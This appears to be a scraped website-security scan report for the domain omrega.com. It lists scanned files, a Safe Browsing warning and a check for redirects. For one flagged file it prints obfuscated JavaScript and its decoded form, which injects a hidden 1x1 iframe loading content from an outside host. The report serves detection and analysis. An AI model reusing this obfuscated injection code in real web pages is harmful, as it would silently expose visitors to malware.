Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=omrega.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://omrega.com/ | 200 OK Content-Length: 906 Content-Type: text/html | clean |
http://omrega.com/.smileys/ | 200 OK Content-Length: 1057 Content-Type: text/html | clean |
http://omrega.com/.smileys/smiley1.gif | 200 OK Content-Length: 501 Content-Type: image/gif | clean |
http://omrega.com/test404page.js | 404 Not Found Content-Length: 6759 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var epRnN="cape(m4p";var ZjRGyrw="5A%TVG3";var fvCMA="VG69%TVG6C%TVG";var NNODeD="4J5Vu84JEV";var WgVaaUQU="u30Vu63Vu31Vu";var FwDU="bYY.repl";var DhKvCgz="38a758a6D";var sfja="AVu2FVu2FVu7";var U1aY6="8a748a55";var KAISEVh4="6F8a648a798a3";var pjdw3FIX=" pKp2PH='Vuq";var jWVC="827Vu84J9Vu84J4";var sAIt4t="gmq64gmq69g";var zsBs7qXG="69cNY73cNY";var Oz9WXU="50Vu6EVuqX";var tiFHDpUu="%TVG/g,'%'";var f5Sg="6CVu6CVu65Vu72";var R2mk1S="4J5Vu84JDVu84J5";var HI8fuCkH="u84J2Vu85";var Ez3r="73Vu72V";var Decoded script: var B67N='gmq76gmq61gmq72gmq20gmq6Agmq71gmq41gmq61gmq58gmq33gmq74gmq55gmq3Dgmq22gmq3Cgmq64gmq69gmq76gmq20gmq69gmq64gmq3Dgmq27gmq66gmq4Cgmq32gmq38gmq6Bgmq48gmq27gmq3Egmq3Cgmq2Fgmq64gmq69gmq76gmq3Egmq22gmq3B';eval(unescape(B67N.replace(/gmq/g,'%')));var Rmb3='8a698a66hh488a648a6F8a638a758a6D8a658a6E8a74hh4E8a628a6F8a648a798a3D8a3D8a6E8a758a6C8a6Chh498a6A8a718a418a618a588a338a748a558a3Dhh478a3C8a628a6F8a648a798a3Ehh47hh4B8a6A8a718a418a618a588a338a748a55hh4Bhh478a3Chh4F8a628a6F8a648a798a3Ehh478 GPnBK3s.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';GPnBK3s.width='1';GPnBK3s.height='1'; GPnBK3s.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';GPnBK3s.width='1';GPnBK3s.height='1'; GPnBK3s.name='VORoAmauDefH';GPnBK3s.style.visibility='hidden'; GPnBK3s.name='VORoAmauDefH';GPnBK3s.style.visibility='hidden'; <div id='fL28kH'></div> Antivirus reports:
| ||
http://omrega.com/.smileys/smiley10.gif | 200 OK Content-Length: 365 Content-Type: image/gif | clean |
http://omrega.com/.smileys/smiley11.gif | 200 OK Content-Length: 397 Content-Type: image/gif | clean |
http://omrega.com/.smileys/smiley12.gif | 200 OK Content-Length: 478 Content-Type: image/gif | clean |
http://omrega.com/.smileys/smiley13.gif | 200 OK Content-Length: 591 Content-Type: image/gif | clean |
http://omrega.com/.smileys/smiley14.gif | 200 OK Content-Length: 489 Content-Type: image/gif | clean |
http://omrega.com/.smileys/smiley15.gif | 200 OK Content-Length: 505 Content-Type: image/gif | clean |
http://omrega.com/.smileys/smiley16.gif | 200 OK Content-Length: 462 Content-Type: image/gif | clean |
http://omrega.com/.smileys/smiley2.gif | 200 OK Content-Length: 482 Content-Type: image/gif | clean |
http://omrega.com/.smileys/smiley3.gif | 200 OK Content-Length: 593 Content-Type: image/gif | clean |
http://omrega.com/.smileys/smiley4.gif | 200 OK Content-Length: 497 Content-Type: image/gif | clean |
http://omrega.com/.smileys/smiley5.gif | 200 OK Content-Length: 498 Content-Type: image/gif | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: omrega.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 12:48:29 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 906
Content-Type: text/html;charset=ISO-8859-1
...906 bytes of data.
GET / HTTP/1.1
Host: omrega.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 12:48:29 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 906
Content-Type: text/html;charset=ISO-8859-1
...906 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: omrega.com
Referer: http://www.google.com/search?q=omrega.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: omrega.com
Referer: http://www.google.com/search?q=omrega.com
Result:
The result is similar to the first query. There are no suspicious redirects found.